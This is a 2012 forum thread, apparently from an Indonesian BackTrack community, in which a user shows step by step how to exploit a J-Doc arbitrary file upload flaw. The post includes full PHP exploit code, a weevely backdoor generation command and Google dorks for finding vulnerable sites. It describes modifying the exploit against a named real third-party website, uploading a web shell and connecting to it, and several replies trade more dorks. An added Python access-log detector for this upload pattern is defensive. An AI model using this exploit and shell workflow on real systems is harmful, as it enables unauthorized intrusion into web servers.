Indonesian Back|Track Team
J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162)




J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - nasa - 08-26-2012

First, as a new user here, I'd like to ask permission to share how to use one of the webapp/0day arbitrary file upload exploits listed at http://1337day.com/exploits/19162. I made this thread because many people often PM me on Facebook asking about 1337day.com. Here I'm only giving an example of one of the easiest exploits, namely arbitrary file upload.

Arbitrary file upload means that an attacker can upload a certain file to the target web server, for example a PHP shell.

The preparation I did:

1. Generate a PHP backdoor with weevely using the password admin, saved in the /root directory under the name tes.php
Code:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate admin /root/tes.php

2. Download the exploit file from http://1337day.com/exploits/19162, which I then saved as jdoc.php in the /root folder
PHP Code:
<?php
# Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload
# Date: 2012-08-10
# Author: leviathan
# Vendor or Software Link: http://www.j-doc.com/
# Version: <= 3.2.7
# Category:: webapps
# Google dork: intext:"Système de partage de documents par Projet"
# Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2
# Demo site: 


// The vulnerable website
$base_url = 'http://localhost/jdoc/';
$file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'info.php';
$file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME);
$folder = '.'; // related to the divers folder

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder);
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
    'Filedata' => '@'.$file_to_upload,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);

if (curl_exec($curl)) {
  echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call);
} else {
  die('error in the exploit');
}


# 1337day.com [2012-08-10]
?>

3. After googling with the dork written in the exploit file, I tried it with the target: http://www.proges.cfiparis.com/jdoc/

4. Edit the jdoc.php file, replacing the value of the $base_url variable with the target website and the $file_to_upload variable with the backdoor generated earlier with weevely, so that jdoc.php becomes:
PHP Code:
<?php
# Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload
# Date: 2012-08-10
# Author: leviathan
# Vendor or Software Link: http://www.j-doc.com/
# Version: <= 3.2.7
# Category:: webapps
# Google dork: intext:"Système de partage de documents par Projet"
# Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2
# Demo site: 


// The vulnerable website
$base_url = 'http://www.proges.cfiparis.com/jdoc/';
$file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'tes.php';
$file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME);
$folder = '.'; // related to the divers folder

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder);
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
    'Filedata' => '@'.$file_to_upload,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);

if (curl_exec($curl)) {
  echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call);
} else {
  die('error in the exploit');
}


# 1337day.com [2012-08-10]
?>

5. Run the exploit file:
Code:
root@bt:~# php jdoc.php

6. After that I tried connecting to the target with weevely:
Code:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://www.proges.cfiparis.com/jdoc/divers/tes.php admin

7. It worked, so I immediately ran the :system.info module, and it turned out to be a Windows server ....

Screenshot:

[Image: jdoc.jpg]

Thanks to the moderators who allowed me to write this article,
viva la backtrack ...

nb: this script can only run if php5-curl is installed. Here I'm using BT 5 R3 and it turned out to throw an error when I ran it; I tried the command apt-get install php5-curl but that didn't work either, so I downloaded the deb file from http://www.ubuntuupdates.org/package/core/lucid/main/security/php5-curl and installed it manually .. :)
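
Added example (not part of the original post or of the 1337day exploit): a defender-side check for the trace the steps above leave in a web access log, namely a POST to divers/upload_filemanager.php followed by the same client fetching a script not seen before from that directory. Combined log format is assumed; the log lines, IP addresses and existing_page.php are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Combined log format: ip - - [time] "METHOD target HTTP/x" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD = "upload_filemanager.php"            # upload endpoint named in the post
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

# Constructed sample log (documentation IPs; existing_page.php is hypothetical).
SAMPLE_LOG = """\
198.51.100.7 - - [26/Aug/2012:10:00:01 +0000] "GET /jdoc/divers/existing_page.php HTTP/1.1" 200 5120
203.0.113.9 - - [26/Aug/2012:10:02:11 +0000] "POST /jdoc/divers/upload_filemanager.php?dossierup=. HTTP/1.1" 200 2
203.0.113.9 - - [26/Aug/2012:10:02:12 +0000] "GET /jdoc/divers/./tes.php HTTP/1.0" 200 0
203.0.113.9 - - [26/Aug/2012:10:02:40 +0000] "GET /jdoc/divers/existing_page.php HTTP/1.1" 200 5120
"""

def find_upload_abuse(lines):
    """Flag scripts first served from an upload directory after a client POSTed to it."""
    known = set()      # script paths already served earlier in the log
    uploads = {}       # client ip -> directories whose upload endpoint it POSTed to
    findings = []
    for raw in lines:
        m = LINE.match(raw)
        if not m:
            continue   # not an access-log line we understand
        ip, when, method, target, status = m.groups()
        path = posixpath.normpath(urlsplit(target).path)   # collapses "divers/./x"
        if method == "POST" and posixpath.basename(path) == UPLOAD:
            uploads.setdefault(ip, set()).add(posixpath.dirname(path))
            continue
        if status != "200" or not path.lower().endswith(SCRIPT_EXT):
            continue
        is_new = path not in known
        known.add(path)
        if is_new and any(path.startswith(d + "/") for d in uploads.get(ip, ())):
            findings.append({"client": ip, "time": when, "path": path})
    return findings

if __name__ == "__main__":
    for hit in find_upload_abuse(SAMPLE_LOG.splitlines()):
        print(hit)
```

A hit is a lead for triage rather than proof of compromise, and a fetch from a different client address than the uploader is not correlated by this sketch. Serving the upload directory with script execution disabled removes the second half of the pattern entirely.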


RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - Al - Ayyubi - 08-26-2012

Thanks for the tutorial, om nasa :)
I'll give it a try too, bro; if I run into problems I'll come back :s


RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - bunglonhijau - 08-26-2012

Wow.. great stuff, bro.. +1
Very useful..


RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - iKONspirasi - 08-26-2012

Great, om nasa; indeed a lot of people ask how to use 1337day.com, hehehe
Now there's an example
+1 from me :)


RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - Udalah - 08-27-2012

Thanks om nasa, very useful :)



RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - alkaaf - 08-27-2012

Bro, could you share the dork?


RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - Udalah - 08-27-2012

(08-27-2012, 05:08 AM)alkaaf Wrote: Bro, could you share the dork?

Try this, bro

Quote:inurl:jdoc



RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - iKONspirasi - 08-27-2012

(08-27-2012, 05:08 AM)alkaaf Wrote: Bro, could you share the dork?

Isn't it right there on 1337day.com:
Code:
intext:"Système de partage de documents par Projet"

I tried it and everything is in French :@


RE: J-Doc <= v3.2.7 Arbitrary file upload (http://1337day.com/exploits/19162) - alkaaf - 08-27-2012

Okay then :D, thumbs up for those who answered. Eh, where's the thumbs-up button? :D